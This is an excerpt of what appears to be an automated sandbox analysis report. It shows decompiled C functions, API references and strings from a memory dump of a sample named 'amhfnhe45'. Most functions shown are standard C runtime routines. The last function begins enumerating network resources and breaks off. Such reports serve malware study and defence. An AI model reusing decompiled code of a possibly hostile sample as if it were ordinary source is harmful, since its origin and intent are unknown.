Part of subcall function 0041FE90: DrawTextA.USER32(00000000,00462918,000000FF,?,00000400), ref: 0041FEE0
Part of subcall function 0041FE90: DrawTextA.USER32(00000000,00462918,000000FF,?,00000010), ref: 0041FEF1
Part of subcall function 0041FE90: GetStockObject.GDI32(0000000D), ref: 0041FEF9
Part of subcall function 0041FE90: SelectObject.GDI32(00000000,00000000), ref: 0041FF01
Part of subcall function 0041FE90: DeleteObject.GDI32(00000000), ref: 0041FF08

SelectObject.GDI32(00000000,00000000), ref: 00420308
DeleteDC.GDI32(00000000), ref: 0042030F
ReleaseDC.USER32(00000000,00000000), ref: 00420322
DeleteObject.GDI32(00000000), ref: 00420333

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041FE90, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45

C-Code - Quality: 100%

			E0041FE90(struct HDC__* __edi, struct tagRECT* __esi) {
				void* _t10;

				_t10 = CreateFontW(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 0, 0, 0, 0x20, L"Tahoma");
				SelectObject(__edi, _t10);
				 *__esi = 0xa;
				__esi->top = 0xa;
				DrawTextA(__edi, 0x462918, 0xffffffff, __esi, 0x400);
				DrawTextA(__edi, 0x462918, 0xffffffff, __esi, 0x10);
				SelectObject(__edi, GetStockObject(0xd));
				DeleteObject(_t10);
				return __esi;
			}

0x0041febb
0x0041febf
0x0041fed3
0x0041fed9
0x0041fee0
0x0041fef1
0x0041ff01
0x0041ff08
0x0041ff11

APIs

CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041FEB5
SelectObject.GDI32(00000000,00000000), ref: 0041FEBF
DrawTextA.USER32(00000000,00462918,000000FF,?,00000400), ref: 0041FEE0
DrawTextA.USER32(00000000,00462918,000000FF,?,00000010), ref: 0041FEF1
GetStockObject.GDI32(0000000D), ref: 0041FEF9
SelectObject.GDI32(00000000,00000000), ref: 0041FF01
DeleteObject.GDI32(00000000), ref: 0041FF08

Strings

Tahoma, xrefs: 0041FE93

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 004289D5, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148

C-Code - Quality: 73%

			E004289D5(void* __edx, WCHAR* _a4) {
				signed int _v8;
				struct HINSTANCE__* _v9;
				void _v508;
				long _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				signed int _t23;
				short _t28;
				void* _t32;
				void* _t34;
				void* _t37;
				long _t38;
				void* _t39;
				struct HINSTANCE__* _t41;
				void* _t42;
				void* _t54;
				long _t56;
				void* _t57;
				WCHAR* _t60;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t66;
				void* _t67;
				void* _t69;

				_t54 = __edx;
				_t64 = _t66;
				_t67 = _t66 - 0x1fc;
				_t18 =  *0x43f054; // 0xd6baf341
				_v8 = _t18 ^ _t64;
				_t60 = _a4;
				_t56 = E004289AF(_t60);
				_t41 = 0;
				_v512 = _t56;
				if(_t56 != 0) {
					if(E0042D651(3) == 1 || E0042D651(3) == 0 &&  *0x43f050 == 1) {
						_t62 = GetStdHandle(0xfffffff4);
						if(_t62 != _t41 && _t62 != 0xffffffff) {
							_t23 = 0;
							while(1) {
								 *((char*)(_t64 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t56 + _t23 * 2));
								if( *((intOrPtr*)(_t56 + _t23 * 2)) == _t41) {
									break;
								}
								_t23 = _t23 + 1;
								if(_t23 < 0x1f4) {
									continue;
								}
								break;
							}
							_v9 = _t41;
							_t20 = WriteFile(_t62,  &_v508, E0042D200( &_v508),  &_v512, _t41);
						}
					} else {
						if(_t60 != 0xfc) {
							_t28 = E0042623B(0x440828, 0x314, L"Runtime Error!\n\nProgram: ");
							_t69 = _t67 + 0xc;
							if(_t28 != 0) {
								_push(_t41);
								_push(_t41);
								_push(_t41);
								_push(_t41);
								_push(_t41);
								goto L10;
							} else {
								_t60 = 0x44085a;
								 *0x440a62 = _t28;
								_t38 = GetModuleFileNameW(_t41, 0x44085a, 0x104);
								_t41 = 0x2fb;
								if(_t38 == 0) {
									_t39 = E0042623B(0x44085a, 0x2fb, L"<program name unknown>");
									_t69 = _t69 + 0xc;
									if(_t39 != 0) {
										L9:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L10:
										E00427081();
									}
								}
							}
							if(E0042AD8C(_t60) + 1 > 0x3c) {
								_t41 = _t41 - (0x4407e4 + E0042AD8C(_t60) * 2 - _t60 >> 1);
								_t37 = E00425E37(0x4407e4 + E0042AD8C(_t60) * 2, _t41, L"...", 3);
								_t69 = _t69 + 0x14;
								if(_t37 != 0) {
									goto L9;
								}
							}
							_t60 = 0x314;
							_t32 = E00425ACD(0x440828, 0x314, L"\n\n");
							_t69 = _t69 + 0xc;
							if(_t32 != 0) {
								goto L9;
							}
							_t34 = E00425ACD(0x440828, 0x314, _v512);
							_t69 = _t69 + 0xc;
							if(_t34 != 0) {
								goto L9;
							}
							_t20 = E0042D4E5(_t54, 0x440828, L"Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				_pop(_t57);
				_pop(_t61);
				_pop(_t42);
				return E004256FE(_t20, _t42, _v8 ^ _t64, _t54, _t57, _t61);
			}

APIs

GetModuleFileNameW.KERNEL32(00000000,0044085A,00000104,00000001,00000000,?), ref: 00428A71

Part of subcall function 00427081: GetCurrentProcess.KERNEL32(C0000417,00000000), ref: 00427097
Part of subcall function 00427081: TerminateProcess.KERNEL32(00000000), ref: 0042709E

Part of subcall function 0042D4E5: LoadLibraryW.KERNEL32(USER32.DLL), ref: 0042D520
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0042D53C
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D54D
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042D55A
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D55D
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042D56A
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D56D
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0042D57A
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D57D
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042D58E
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D591
Part of subcall function 0042D4E5: DecodePointer.KERNEL32(00000000,00440828,00000314,00000000), ref: 0042D5B3
Part of subcall function 0042D4E5: DecodePointer.KERNEL32 ref: 0042D5BD
Part of subcall function 0042D4E5: DecodePointer.KERNEL32(?,00440828,00000314,00000000), ref: 0042D5FC
Part of subcall function 0042D4E5: DecodePointer.KERNEL32(?), ref: 0042D616
Part of subcall function 0042D4E5: DecodePointer.KERNEL32(00440828,00000314,00000000), ref: 0042D62A

GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 00428B23
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00428B6F

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Runtime Error!Program: , xrefs: 00428A3F
Microsoft Visual C++ Runtime Library, xrefs: 00428B07
<program name unknown>, xrefs: 00428A80
..., xrefs: 00428AC1

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042A5AB, Relevance: 12.1, APIs: 8, Instructions: 61

C-Code - Quality: 100%

			E0042A5AB(LONG* _a4) {
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				LONG* _t21;
				LONG** _t32;
				LONG* _t34;

				_t34 = _a4;
				if(_t34 == 0) {
					L18:
					return _t34;
				}
				InterlockedDecrement(_t34);
				_t2 =  &(_t34[0x2c]); // 0x541b1024
				_t16 =  *_t2;
				if(_t16 != 0) {
					InterlockedDecrement(_t16);
				}
				_t3 =  &(_t34[0x2e]); // 0x824442b
				_t17 =  *_t3;
				if(_t17 != 0) {
					InterlockedDecrement(_t17);
				}
				_t4 =  &(_t34[0x2d]); // 0xdb331424
				_t18 =  *_t4;
				if(_t18 != 0) {
					InterlockedDecrement(_t18);
				}
				_t5 =  &(_t34[0x30]); // 0xd8f7daf7
				_t19 =  *_t5;
				if(_t19 != 0) {
					InterlockedDecrement(_t19);
				}
				_t6 =  &(_t34[0x14]); // 0x42d460
				_t32 = _t6;
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t32 - 8)) != 0x43f984) {
						_t20 =  *_t32;
						if(_t20 != 0) {
							InterlockedDecrement(_t20);
						}
					}
					if( *((intOrPtr*)(_t32 - 4)) != 0) {
						_t10 =  &(_t32[1]); // 0x8bd88bf1
						_t21 =  *_t10;
						if(_t21 != 0) {
							InterlockedDecrement(_t21);
						}
					}
					_t32 =  &(_t32[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				_t13 =  &(_t34[0x35]); // 0x55ff8b00
				InterlockedDecrement( *_t13 + 0xb4);
				goto L18;
			}

APIs

InterlockedDecrement.KERNEL32(0042D410,-0000006C,?,?,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?), ref: 0042A5C5
InterlockedDecrement.KERNEL32(541B1024,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?,?,0042D410), ref: 0042A5D2
InterlockedDecrement.KERNEL32(0824442B,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?,?,0042D410), ref: 0042A5DF
InterlockedDecrement.KERNEL32(DB331424,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?,?,0042D410), ref: 0042A5EC
InterlockedDecrement.KERNEL32(D8F7DAF7,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?,?,0042D410), ref: 0042A5F9
InterlockedDecrement.KERNEL32(D8F7DAF7,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?), ref: 0042A615
InterlockedDecrement.KERNEL32(8BD88BF1,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?), ref: 0042A625
InterlockedDecrement.KERNEL32(55FF8A4C,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?), ref: 0042A63B

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042A51C, Relevance: 12.1, APIs: 8, Instructions: 58

C-Code - Quality: 100%

			E0042A51C(LONG* _a4) {
				LONG* _t15;
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				long* _t30;
				LONG* _t31;

				_t31 = _a4;
				InterlockedIncrement(_t31);
				_t15 = _t31[0x2c];
				if(_t15 != 0) {
					InterlockedIncrement(_t15);
				}
				_t16 = _t31[0x2e];
				if(_t16 != 0) {
					InterlockedIncrement(_t16);
				}
				_t17 = _t31[0x2d];
				if(_t17 != 0) {
					InterlockedIncrement(_t17);
				}
				_t18 = _t31[0x30];
				if(_t18 != 0) {
					InterlockedIncrement(_t18);
				}
				_t30 =  &(_t31[0x14]);
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t30 - 8)) != 0x43f984) {
						_t19 =  *_t30;
						if(_t19 != 0) {
							InterlockedIncrement(_t19);
						}
					}
					if( *((intOrPtr*)(_t30 - 4)) != 0) {
						_t20 = _t30[1];
						if(_t20 != 0) {
							InterlockedIncrement(_t20);
						}
					}
					_t30 =  &(_t30[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				return InterlockedIncrement(_t31[0x35] + 0xb4);
			}

0x0042a52a
0x0042a52e
0x0042a530
0x0042a538
0x0042a53b
0x0042a53b
0x0042a53d
0x0042a545
0x0042a548
0x0042a548
0x0042a54a
0x0042a552
0x0042a555
0x0042a555
0x0042a557
0x0042a55f
0x0042a562
0x0042a562
0x0042a564
0x0042a567
0x0042a56e
0x0042a575
0x0042a577
0x0042a57b
0x0042a57e
0x0042a57e
0x0042a57b
0x0042a584
0x0042a586
0x0042a58b
0x0042a58e
0x0042a58e
0x0042a58b
0x0042a590
0x0042a593
0x0042a593
0x0042a593
0x0042a5aa

APIs

InterlockedIncrement.KERNEL32(?,00000001,?,?,?,0042A961,?), ref: 0042A52E
InterlockedIncrement.KERNEL32(00000000,?,0042A961,?), ref: 0042A53B
InterlockedIncrement.KERNEL32(00000000,?,0042A961,?), ref: 0042A548
InterlockedIncrement.KERNEL32(?,?,0042A961,?), ref: 0042A555
InterlockedIncrement.KERNEL32(?,?,0042A961,?), ref: 0042A562
InterlockedIncrement.KERNEL32(?,?,0042A961,?), ref: 0042A57E
InterlockedIncrement.KERNEL32(?,?,0042A961,?), ref: 0042A58E
InterlockedIncrement.KERNEL32(0041B6B5,?,0042A961,?), ref: 0042A5A4

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042FA96, Relevance: 9.2, APIs: 6, Instructions: 156

C-Code - Quality: 92%

			E0042FA96(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t30;
				signed int _t34;
				signed int _t38;
				void* _t40;
				signed int _t41;
				signed int _t44;
				intOrPtr* _t47;
				void* _t50;
				long _t52;
				void* _t53;
				signed int _t60;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int _t82;

				_t68 = __edx;
				_t60 = 0;
				_v20 = 0;
				_v16 = 0;
				_t30 = E0042C6B7(__ecx, _a4, 0, 0, 1);
				_v28 = _t30;
				_t76 = _t75 + 0x10;
				_v24 = _t68;
				if((_t30 & _t68) == 0xffffffff) {
					L7:
					return  *((intOrPtr*)(E00427125(_t84)));
				}
				_t34 = E0042C6B7(__ecx, _a4, 0, 0, 2);
				_t64 = _t34 & _t68;
				_t77 = _t76 + 0x10;
				if((_t34 & _t68) == 0xffffffff) {
					goto L7;
				}
				_t69 = _a12;
				_t71 = _a8 - _t34;
				_t82 = _t71;
				asm("sbb edi, edx");
				if(_t82 < 0 || _t82 <= 0 && _t71 <= 0) {
					__eflags = _t69 - _t60;
					if(__eflags > 0) {
						goto L31;
					}
					if(__eflags < 0) {
						L27:
						_t38 = E0042C6B7(_t64, _a4, _a8, _a12, _t60);
						_t77 = _t77 + 0x10;
						__eflags = (_t38 & _t68) - 0xffffffff;
						if(__eflags == 0) {
							goto L7;
						}
						_t40 = E0042F2AE(_a4);
						_pop(_t64);
						_t41 = SetEndOfFile(_t40);
						asm("sbb eax, eax");
						_t44 =  ~( ~_t41) - 1;
						asm("cdq");
						_v20 = _t44;
						_v16 = _t68;
						__eflags = (_t44 & _t68) - 0xffffffff;
						if(__eflags != 0) {
							goto L31;
						}
						 *((intOrPtr*)(E00427125(__eflags))) = 0xd;
						_t47 = E00427138(__eflags);
						 *_t47 = GetLastError();
						_t73 = _v20;
						goto L30;
					}
					__eflags = _t71 - _t60;
					if(_t71 >= _t60) {
						goto L31;
					}
					goto L27;
				} else {
					_t50 = HeapAlloc(GetProcessHeap(), 8, 0x1000);
					_v8 = _t50;
					_t84 = _t50;
					if(_t50 != 0) {
						_v12 = E00430278(_a4, 0x8000);
						goto L10;
						do {
							do {
								L10:
								__eflags = _t69;
								if(__eflags < 0) {
									L14:
									_t52 = _t71;
									L15:
									_t53 = E0042C826(0x1000, _t68, _a4, _v8, _t52);
									_t77 = _t77 + 0xc;
									__eflags = _t53 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E00427138(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E00427125(__eflags))) = 0xd;
										}
										_t73 = _t71 | 0xffffffff;
										_v16 = _t73;
										L20:
										E00430278(_a4, _v12);
										_pop(_t64);
										HeapFree(GetProcessHeap(), 0, _v8);
										_t60 = 0;
										L30:
										__eflags = (_t73 & _v16) - 0xffffffff;
										if(__eflags == 0) {
											goto L7;
										}
										L31:
										__eflags = (E0042C6B7(_t64, _a4, _v28, _v24, _t60) & _t68) - 0xffffffff;
										if(__eflags == 0) {
											goto L7;
										}
										return 0;
									}
									asm("cdq");
									_t71 = _t71 - _t53;
									__eflags = _t71;
									asm("sbb edi, edx");
									if(__eflags < 0) {
										goto L19;
									}
									goto L17;
								}
								if(__eflags > 0) {
									L13:
									_t52 = 0x1000;
									goto L15;
								}
								__eflags = _t71 - 0x1000;
								if(_t71 < 0x1000) {
									goto L14;
								}
								goto L13;
								L17:
							} while (__eflags > 0);
							__eflags = _t71;
						} while (_t71 != 0);
						L19:
						_t73 = _v20;
						goto L20;
					}
					 *((intOrPtr*)(E00427125(_t84))) = 0xc;
					goto L7;
				}
			}

APIs

Part of subcall function 0042C6B7: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,0042C8F9,00000000,00000000,00000000,00000002,00000000,00000001), ref: 0042C6F9
Part of subcall function 0042C6B7: GetLastError.KERNEL32(?,0042C8F9,00000000,00000000,00000000,00000002,00000000,00000001,00000000,?,0042CFB8,00000000,004257B7,?,0043C368,00000010), ref: 0042C706

GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA,00000109,00000000), ref: 0042FAFF
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA,00000109,00000000), ref: 0042FB06

Part of subcall function 0042C826: GetConsoleMode.KERNEL32(00000000,?), ref: 0042C936
Part of subcall function 0042C826: GetConsoleCP.KERNEL32 ref: 0042C956
Part of subcall function 0042C826: WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,004257B7,00000005,00000000,00000000), ref: 0042CA46
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,004257B7,00000000,?,00000000), ref: 0042CA6F
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,004257B7,00000001,?,00000000), ref: 0042CAC8
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CC36
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CD10
Part of subcall function 0042C826: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042CDE0
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042CE11
Part of subcall function 0042C826: GetLastError.KERNEL32 ref: 0042CE27
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CE68
Part of subcall function 0042C826: GetLastError.KERNEL32(?,0042CFB8,00000000,004257B7,?,0043C368,00000010,00426F28,004257B7,00000000,00000001,?,00000000,00000000), ref: 0042CE87

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA), ref: 0042FB82
HeapFree.KERNEL32(00000000), ref: 0042FB89
SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA), ref: 0042FBE4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA,00000109), ref: 0042FC11

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042A89B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50

C-Code - Quality: 58%

			E0042A89B() {
				signed int _t3;
				long _t4;
				struct _CRITICAL_SECTION* _t5;
				struct _CRITICAL_SECTION* _t14;
				signed int* _t17;
				struct _CRITICAL_SECTION** _t18;

				_t3 =  *0x43fbcc; // 0x4
				if(_t3 != 0xffffffff) {
					__imp__DecodePointer( *0x440e94, _t3);
					 *_t3();
					 *0x43fbcc =  *0x43fbcc | 0xffffffff;
				}
				_t4 =  *0x43fbd0; // 0x1b
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
					 *0x43fbd0 =  *0x43fbd0 | 0xffffffff;
				}
				_t17 = 0x43fc30;
				do {
					_t14 =  *_t17;
					if(_t14 != 0 && _t17[1] != 1) {
						DeleteCriticalSection(_t14);
						E004258E3(_t14);
						 *_t17 =  *_t17 & 0x00000000;
					}
					_t17 =  &(_t17[2]);
				} while (_t17 < 0x43fd50);
				_t18 = 0x43fc30;
				do {
					_t5 =  *_t18;
					if(_t5 != 0 && _t18[1] == 1) {
						DeleteCriticalSection(_t5);
					}
					_t18 =  &(_t18[2]);
				} while (_t18 < 0x43fd50);
				return _t5;
			}

APIs

DecodePointer.KERNEL32(00000004,0042ACC4,?,00426BF2), ref: 0042A8AC
TlsFree.KERNEL32(0000001B,0042ACC4,?,00426BF2), ref: 0042A8C6
DeleteCriticalSection.KERNEL32(00000000,00000000,77CFA295,?,0042ACC4,?,00426BF2), ref: 0042B8E8

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32(00000000,?,0042A9F6,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000), ref: 0042590B

DeleteCriticalSection.KERNEL32(0000001B,77CFA295,?,0042ACC4,?,00426BF2), ref: 0042B912

Strings

)jJ)jJ)jJ)jJ)jJ)jJ)jJ)jJ)jJ)jJ, xrefs: 0042B8F7, 0042B917

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 004267E8, Relevance: 7.6, APIs: 5, Instructions: 98

C-Code - Quality: 24%

			E004267E8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				intOrPtr* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr* _t53;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				_push(0x20);
				_push(0x43c0e0);
				E00428E80(__ebx, __edi, __esi);
				E0042B9FB(__ebx, __edi, 8);
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				_t58 =  *0x4404d4 - 1; // 0x0
				if(_t58 != 0) {
					 *0x4404d0 = 1;
					_t34 =  *((intOrPtr*)(_t56 + 0x10));
					 *0x4404cc =  *((intOrPtr*)(_t56 + 0x10));
					if( *((intOrPtr*)(_t56 + 0xc)) == 0) {
						_t55 = __imp__DecodePointer;
						_t34 =  *_t55( *0x4833b4);
						_t45 = 1;
						 *((intOrPtr*)(_t56 - 0x30)) = 1;
						if(1 != 0) {
							_t34 =  *_t55( *0x4833b0);
							_t53 = 1;
							 *((intOrPtr*)(_t56 - 0x2c)) = 1;
							 *((intOrPtr*)(_t56 - 0x24)) = 1;
							 *((intOrPtr*)(_t56 - 0x28)) = 1;
							while(1) {
								_t53 = _t53 - 4;
								 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
								if(_t53 < _t45) {
									goto L11;
								}
								if( *_t53 == _t34) {
									continue;
								} else {
									if(_t53 >= _t45) {
										_t40 =  *_t55( *_t53);
										 *_t53 = E0042A855(_t40);
										 *_t40();
										_t47 =  *_t55( *0x4833b4);
										_t34 =  *_t55( *0x4833b0);
										if( *((intOrPtr*)(_t56 - 0x24)) != _t47 ||  *((intOrPtr*)(_t56 - 0x28)) != _t34) {
											 *((intOrPtr*)(_t56 - 0x24)) = _t47;
											 *((intOrPtr*)(_t56 - 0x30)) = _t47;
											 *((intOrPtr*)(_t56 - 0x28)) = _t34;
											_t53 = _t34;
											 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
										}
										_t45 =  *((intOrPtr*)(_t56 - 0x30));
										continue;
									}
								}
								goto L11;
							}
						}
						L11:
						 *((intOrPtr*)(_t56 - 0x1c)) = 0x43129c;
						while( *((intOrPtr*)(_t56 - 0x1c)) < 0x4312a8) {
							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x1c))));
							if(_t34 != 0) {
								_t34 =  *_t34();
							}
							 *((intOrPtr*)(_t56 - 0x1c)) =  *((intOrPtr*)(_t56 - 0x1c)) + 4;
						}
					}
					 *((intOrPtr*)(_t56 - 0x20)) = 0x4312ac;
					while( *((intOrPtr*)(_t56 - 0x20)) < 0x4312b0) {
						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x20))));
						if(_t34 != 0) {
							_t34 =  *_t34();
						}
						 *((intOrPtr*)(_t56 - 0x20)) =  *((intOrPtr*)(_t56 - 0x20)) + 4;
					}
				}
				 *(_t56 - 4) = 0xfffffffe;
				L23();
				if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
					return E00428EC5(_t34);
				} else {
					 *0x4404d4 = 1;
					_t36 = E0042B922(8);
					E004266D0( *((intOrPtr*)(_t56 + 8)));
					if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
						return E0042B922(8);
					}
					return _t36;
				}
			}

0x004267e8
0x004267ea
0x004267ef
0x004267f6
0x004267fc
0x00426803
0x00426809
0x0042680f
0x00426814
0x00426817
0x00426820
0x0042682c
0x00426832
0x00426834
0x00426836
0x0042683b
0x00426843
0x00426845
0x00426847
0x0042684a
0x0042684d
0x00426850
0x00426850
0x00426853
0x00426858
0x00000000
0x00000000
0x00426861
0x00000000
0x00426863
0x00426865
0x00426869
0x00426872
0x00426874
0x0042687e
0x00426886
0x0042688b
0x00426892
0x00426895
0x00426898
0x0042689b
0x0042689d
0x0042689d
0x004268a0
0x00000000
0x004268a0
0x00426865
0x00000000
0x00426861
0x00426850
0x004268a5
0x004268a5
0x004268ac
0x004268b8
0x004268bc
0x004268be
0x004268be
0x004268c0
0x004268c0
0x004268ac
0x004268c6
0x004268cd
0x004268d9
0x004268dd
0x004268df
0x004268df
0x004268e1
0x004268e1
0x004268cd
0x004268e7
0x004268ee
0x004268f7
0x00426927
0x004268f9
0x004268f9
0x00426905
0x0042690e
0x00426917
0x00000000
0x00426920
0x00426921
0x00426921

APIs

Part of subcall function 0042B9FB: EnterCriticalSection.KERNEL32(?,?,?,0042A922,0000000D), ref: 0042BA25

DecodePointer.KERNEL32(0043C0E0,00000020,0042694F,?,00000001,00000000,?,0042698F,000000FF,?,0042BA22,00000011,?,?,0042A922,0000000D), ref: 00426832
DecodePointer.KERNEL32(?,0042698F,000000FF,?,0042BA22,00000011,?,?,0042A922,0000000D), ref: 00426843

Part of subcall function 0042A855: EncodePointer.KERNEL32(00000000,0042D50B,00440828,00000314,00000000,?,?,?,?,?,00428B12,00440828,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A857

DecodePointer.KERNEL32(-00000004,?,0042698F,000000FF,?,0042BA22,00000011,?,?,0042A922,0000000D), ref: 00426869
DecodePointer.KERNEL32(?,0042698F,000000FF,?,0042BA22,00000011,?,?,0042A922,0000000D), ref: 0042687C
DecodePointer.KERNEL32(?,0042698F,000000FF,?,0042BA22,00000011,?,?,0042A922,0000000D), ref: 00426886

Part of subcall function 0042B922: LeaveCriticalSection.KERNEL32(?,0042B9F9,0000000A,0042B9E9,0043C2A8,0000000C,0042BA16,?,?,?,0042A922,0000000D), ref: 0042B931

Part of subcall function 004266D0: ExitProcess.KERNEL32 ref: 004266E1

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00413740, Relevance: 7.6, APIs: 5, Instructions: 96

C-Code - Quality: 96%

			E00413740(void* _a4) {
				int _v8;
				int _v12;
				void* _t20;
				signed int _t26;
				signed int _t29;
				void* _t37;
				void* _t50;
				intOrPtr* _t53;
				void* _t54;

				_v8 = 0x4000;
				_v12 = 0xffffffff;
				if(WNetOpenEnumW(2, 0, 0, _a4,  &_a4) == 0) {
					_t20 = GlobalAlloc(0x40, _v8);
					_t37 = _t20;
					if(_t37 != 0) {
